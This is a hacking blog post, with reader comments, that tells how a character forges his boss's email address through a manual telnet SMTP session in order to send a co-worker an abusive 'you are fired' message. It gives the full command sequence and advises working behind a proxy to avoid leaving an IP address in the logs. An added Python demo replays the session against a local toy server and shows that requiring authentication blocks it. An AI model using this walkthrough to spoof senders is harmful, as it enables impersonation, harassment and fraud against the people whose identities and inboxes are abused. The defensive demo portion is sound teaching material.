How n00b Learnt To Spoof Email Addresses
Thursday | Labels: Hacking
The story starts with our hero n00b coming home frustrated and tired. It had been a hard day at the office, and it was his co-worker n00x who had made it terrible. n00b was pissed off and was thinking of some way to get even with n00x.
Finally he got the idea: spoof his boss's email address and, with it, mail n00x (brainy, n00b!).
n00b works for a firm named firmA. He knows that all three of them, he, n00x and the boss of the company, have email accounts on the company's own mail server. That's good, because the trick he has in mind relies on the forged sender and the recipient being in the same domain: the server accepts such a message as local delivery and never has to relay it anywhere else.
He knows his own email address is n00b@firma.com, so he has the domain: firma.com.
Now his first job is to find the address of firmA's mail server.
Too small a task for our hero. He could have run an nslookup query from his command line (nslookup can be told to return only the MX records), but he chose the easier way.
He visited http://centralops.net/co/DomainDossier.aspx, typed in his domain name, firma.com, and ran a "DNS records" lookup. He got a long list of information about the domain, but what he needed were the records labelled MX, meaning "Mail Exchange". There were several such records (each carries a preference number, and the one with the lowest number is the primary server); he chose one and noted the server's address. It was mail.firma.com. (So far, so good!)
Next he turns off his firewall, opens the command prompt and gives the command:
telnet mail.firma.com 25
He knows it is important to give the port number as the last argument of the command; 25 is the default SMTP port. Even though this particular server used port 25, it is NOT necessary that every SMTP server listens on 25. Many big services use other ports, for example 587 for authenticated message submission or 465 for SMTP over TLS. If n00b had gone after one of those, he would have researched everything on the net before planning the attack.
The connection opens and on the next screen he is greeted by the mail server's banner, which looked something like this:
220 mail.firma.com ESMTP MAIL Service, Version: 6.0.3790.1830 ready at Tue, 19 Jul 2007 14:44:12 -0500
(Looks good! The 220 reply code means the server is ready. Every SMTP reply begins with a three-digit code; a 2xx or 3xx code means the last command was accepted, 4xx and 5xx mean it was refused.)
Now he gives the command:
helo firma.com
With this he introduces himself to the server. The argument is the name his client claims for itself, which the server writes into the message's Received: header; sending ehlo instead would also make the server list its extensions, such as AUTH and STARTTLS. The server responded:
250 mail.firma.com at your service
Next he types:
mail from: boss@firma.com
With this he tells the server that the envelope sender, the address any bounce would go back to, is boss@firma.com. The server simply takes his word for it; nothing in plain SMTP checks that the person typing actually owns that address.
In the next command he defines the recipient:
rcpt to: n00x@firma.com
Now he needs to compose the mail. He gives the command to start the message input:
data
The server answers with a 354 reply and he types his mail:
you are a real sucker. I am fed up. You are fired! just get lost.
Now he presses Enter, types a "." (a period alone on its line) and presses Enter again; the lone period marks the end of the message.
The server says the command completed successfully, and sends his mail! n00b walks out for a victory coke.
Everything typed after data is the message itself: headers such as From:, To: and Subject: are expected first, then a blank line, then the body. It is that From: header, not the mail from command, that the recipient's mail client displays as the sender, so a careful spoofer types one; n00b typed only the body. The trick worked because this server accepted an unauthenticated mail from for one of its own addresses. A server that requires authentication before accepting mail from, or one that checks the connecting IP address against the sender domain's SPF record, would have refused the message.
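As an added example that is not part of the original post, here is the whole exchange above replayed in Python against a throwaway SMTP server running on the local machine, so it runs offline and touches no real mail system. The server is a stand-in for mail.firma.com written for this demonstration and uses the post's placeholder names (firma.com, boss@firma.com, n00x@firma.com); it shows both sides of the dialogue, accepts the forged sender without any check the way the post's server did, refuses to relay for foreign domains, and, when started with require_auth=True (a parameter invented here), refuses MAIL FROM the way an authenticated submission port would. The MX lookup step is left out because the server's address is already known. Unlike n00b, the client sends From:, To: and Subject: headers in the DATA section.

```python
import socket
import threading

# Constructed demo, not code from the original post: firma.com, boss@firma.com and
# n00x@firma.com are the post's placeholder names, and the toy server stands in for
# the real MTA, listening only on 127.0.0.1 so that everything runs offline.
LOCAL_DOMAIN = "firma.com"  # domain the server delivers for; anything else is relaying

def _send(conn, line):
    conn.sendall((line + "\r\n").encode())

def _readline(f):
    raw = f.readline()  # b"" only at EOF; an empty line arrives as b"\r\n"
    return raw.decode(errors="replace").rstrip("\r\n") if raw else None

def serve_one(listener, require_auth, store):
    """One SMTP session; require_auth=True refuses MAIL FROM, as a submission port would."""
    conn, _ = listener.accept()
    f = conn.makefile("rb")
    env = {"mail_from": None, "rcpt_to": [], "data": ""}
    _send(conn, "220 mail.firma.com ESMTP ready")
    while (line := _readline(f)) is not None:
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb in ("HELO", "EHLO"):
            _send(conn, "250 mail.firma.com at your service")
        elif verb == "MAIL" and require_auth:  # nobody on this connection authenticated
            _send(conn, "530 Authentication required")
        elif verb == "MAIL":  # envelope sender, taken on faith exactly as the post's server did
            env["mail_from"] = arg.split(":", 1)[1].strip(" <>")
            _send(conn, "250 OK")
        elif verb == "RCPT":
            rcpt = arg.split(":", 1)[1].strip(" <>")
            local = rcpt.lower().endswith("@" + LOCAL_DOMAIN)
            env["rcpt_to"] += [rcpt] if local else []
            _send(conn, "250 OK" if local else "550 Relaying denied")  # not an open relay
        elif verb == "DATA":
            _send(conn, "354 End data with <CRLF>.<CRLF>")
            body = []
            while (raw := _readline(f)) not in (".", None):  # a lone "." ends the message
                body.append(raw[1:] if raw.startswith("..") else raw)  # dot-unstuffing
            env["data"] = "\n".join(body)
            store.append(dict(env))  # "queued" for local delivery
            _send(conn, "250 Queued")
        elif verb == "QUIT":
            _send(conn, "221 Bye")
            break
        else:
            _send(conn, "500 Unrecognised command")
    conn.close()

def smtp_client(port, mail_from, rcpt_to, message):
    """Type the post's command sequence; returns (transcript, reply code to MAIL FROM)."""
    transcript = []
    sock = socket.create_connection(("127.0.0.1", port))
    f = sock.makefile("rb")

    def send(cmd):  # send one command (None: just read the banner), return the reply code
        if cmd is not None:
            transcript.append(("C", cmd))
            _send(sock, cmd)
        reply = _readline(f) or ""
        transcript.append(("S", reply))
        return reply[:3]

    send(None)
    send("helo " + LOCAL_DOMAIN)
    code = send("mail from: " + mail_from)
    if code == "250" and send("rcpt to: " + rcpt_to) == "250" and send("data") == "354":
        for line in message.splitlines():
            transcript.append(("C", line))
            _send(sock, "." + line if line.startswith(".") else line)  # dot-stuffing
        send(".")  # the lone period that ends the message
    send("quit")
    sock.close()
    return transcript, code

def run_demo(require_auth=False):
    """Run the session against the toy server; returns (transcript, accepted messages, code)."""
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    store = []
    worker = threading.Thread(target=serve_one, args=(listener, require_auth, store))
    worker.start()
    # The recipient's mail client shows the From: header below as the sender, not the
    # envelope MAIL FROM; n00b in the post typed only the last line, with no headers.
    message = ("From: boss@firma.com\nTo: n00x@firma.com\nSubject: Notice\n\n"
               "you are a real sucker. I am fed up. You are fired! just get lost.")
    transcript, code = smtp_client(listener.getsockname()[1], "boss@firma.com",
                                   "n00x@firma.com", message)
    worker.join()
    listener.close()
    return transcript, store, code

if __name__ == "__main__":
    for who, line in run_demo()[0]:
        print(who + ": " + line)
```

Running the file prints the transcript with client lines marked C and server lines marked S. Calling run_demo(require_auth=True) instead returns no accepted messages and a 530 reply to MAIL FROM, which is the behaviour to expect from a server that has been hardened against this trick.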
n00b was an experienced player. He knew that taking security precautions was necessary, because if he slipped his IP address would be recorded in the server's log file (and in the Received: header the server adds to the message). He took many measures, such as doing everything from behind a proxy server.
-n00b
DISCLAIMER: Everything posted here is for educational purposes only. I am NOT responsible for your actions and whatever use you might put this information to. Hacking is illegal and a crime.
It is not for newbies. If you don't know what you are doing you might slip and end up in a big mess! You have been warned. I'll never admit I did it (of course, admitting would be like accepting your crime).

OK, so port 25 doesn't work. How do I "research on the net" to find the real port #?
Hi rick,
Thanks for dropping by.
To answer your question, there are many ways by which you can find out which port is being used for POP and SMTP.
You can go through the configuration settings of a mail client program like Outlook Express, Thunderbird etc. that is already configured to work with the company mail server;
there are many other ways, like going through the MX records of the domain.
This job is easy; all you need is to think it over.